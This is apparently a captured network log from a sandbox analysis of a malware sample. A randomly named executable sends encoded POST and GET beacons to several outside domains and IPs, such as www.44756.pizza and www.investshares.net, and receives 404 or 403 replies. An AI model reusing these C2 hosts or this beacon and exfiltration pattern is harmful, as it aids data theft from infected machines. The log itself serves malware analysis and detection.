                                                                      Date: Mon, 13 Jan 2025 14:12:39 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWIim4cKpCgYImUdI7SP2%2BD%2BCxuR3HTeypD9hmDZ6lC0J%2BVs0rClhHwG65e%2FhO5PrRIQmRRraOHnJfQRNSlR41jkSxSHv0pCtmXF1Quooyyu1YRs2vHK0VT1EmqeW4%2F%2Fpcie"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb7eeffa0f5d-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Jan 13, 2025 15:12:39.118475914 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      8 | 192.168.2.8 | 49717 | 104.21.18.171 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:41.008698940 CET | 482 | OUT | GET /kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.grimbo.boats
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:41.678679943 CET | 1113 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:41 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KK%2FJ7Ij1qP1IG2N7Q%2FHf5Q%2Fc%2BjJhMiJNyqNO%2F6QA0Me2deDq0UsvV6yusfLWwyzThMVN1nDwr9kY%2FHGcdb%2FU%2FppC63oglpjjOjEyjmNNyze%2BS2fHosaqbfj6VJRFHS%2BhTTqy"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb8efd8d43ee-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1723&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      9 | 192.168.2.8 | 49718 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:47.765522003 CET | 734 | OUT | POST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpRMdyMNQX4dAiS5m/NrMmIbnlmJY6lSXG8uj4hg=
                                                                      Jan 13, 2025 15:12:48.675133944 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:48 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      10 | 192.168.2.8 | 49719 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:50.308125973 CET | 754 | OUT | POST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlIzMllhu/SP/cf+Tm223XhxMSX7sLETUmOk61x1m
                                                                      Jan 13, 2025 15:12:51.250098944 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:51 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      11 | 192.168.2.8 | 49720 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:52.861541033 CET | 1771 | OUT | POST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4= [TRUNCATED]
                                                                      Jan 13, 2025 15:12:53.778836012 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:53 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.8 | 49721 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:12:55.399000883 CET | 481 | OUT | GET /a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.44756.pizza
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:56.295811892 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:56 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      13 | 192.168.2.8 | 49722 | 199.192.21.169 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:01.500821114 CET | 743 | OUT | POST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAO5OfTHjbWDdfafzu1T/l3bLftUhQew76Yl52UZ4=
                                                                      Jan 13, 2025 15:13:02.050100088 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:01 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      14 | 192.168.2.8 | 49723 | 199.192.21.169 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:04.051412106 CET | 763 | OUT | POST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bj0tXJmbHmSCGpGKOsEwTnsAZY8eKqpSAJ+YPhQ
                                                                      Jan 13, 2025 15:13:04.656794071 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:04 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      15 | 192.168.2.8 | 49724 | 199.192.21.169 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:06.604235888 CET | 1780 | OUT | POST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4= [TRUNCATED]
                                                                      Jan 13, 2025 15:13:07.261768103 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:07 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      16 | 192.168.2.8 | 49725 | 199.192.21.169 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:09.152055979 CET | 484 | OUT | GET /bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.lonfor.website
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:09.724921942 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:09 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      17 | 192.168.2.8 | 49726 | 154.197.162.239 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:15.123614073 CET | 749 | OUT | POST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIRlcYVBY/s1EwxSxY3Q0BLKpxtq1KebeKZC5B8E=
                                                                      Jan 13, 2025 15:13:15.725334883 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      18 | 192.168.2.8 | 49727 | 154.197.162.239 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:17.671190977 CET | 769 | OUT | POST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLiCxuCDPpG2Q6SJfrQvAX9m7Nk7+DQA0AHzDd91
                                                                      Jan 13, 2025 15:13:18.240880013 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:42 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.8 | 49728 | 154.197.162.239 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:20.219346046 CET | 1786 | OUT | POST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/w++B+lRlI1AK+ypsaEG5OLRKWxDs0ZKicM9PsS/QB3jGrBBtMpUhatn+1cQYpb2kFsqGr+Y/08oyE/OATCdGlsPXD8UE/Evx/bDYSf+5GVqDJmsu/KuPqxtYJkVQ9ppc72ab7TvEE7tkjnzELhS1l0rqHWEp7MnMtx8Mg5QPBK7ixmCAtfOv2xYhzTx5hg6UtL1vgMBCQtt+YR7B60otxNOL6Wpz2n+/Gp8iz/l1dBcfBRNttlZu/+1prfkY2C4N3QwzurAElgrshcdyCaPdcIV9Blkscmev0QBJWWEYmaG1Yxfg4Fr478VNF6k4FASNKYbp4VtdS4A6bLAL/nrcbHX1O8PF25mIEbjUThD+23bvSnXWBswzobYSl402j3/y5YXh2YaOIVQh/oOMGdbLGPC2l99dIUU+5IH9fqcpDi+ic1FW1sdzuzeoAzmuarGID4FWr+P01DWX85WRWbRH43K/na9ivroElvu1KtOr2f9KrEnypcCnk8JDyFkffFkCbWqxwTBHWNqGFB1WnkFVXICQzmfbSSsYj2dhpanGyQQTIr4icOKfEaNHt2k5UAhelu+K5EfmaOEieZTA5n344he5I1rMpuP14YhUOwGQQZ9wPs04tOQ1DjOOdTUOxTl3OVLJC1ebhMvVj1b88GLbUqXMcvR5RnRChF6rDuV0bKVVgL6t1+ou76Mte2910oo0x+j9sXRRp/gFLoXx0Fclm/pMScYRioj6zO/r+7DJJ8hBBe2DX5Opk20n61VTRq0R8c3kAdQrpq3RnF9wph8qxyVg6IvPcizXSpzZXCNfJBRumNTjEnnzaPuFYTdnBmsyPGnKn [TRUNCATED]
                                                                      Jan 13, 2025 15:13:20.807104111 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.8 | 49729 | 154.197.162.239 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:22.768860102 CET | 486 | OUT | GET /cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.investshares.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:23.336569071 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:47 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.8 | 49730 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:28.510818958 CET | 758 | OUT | POST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
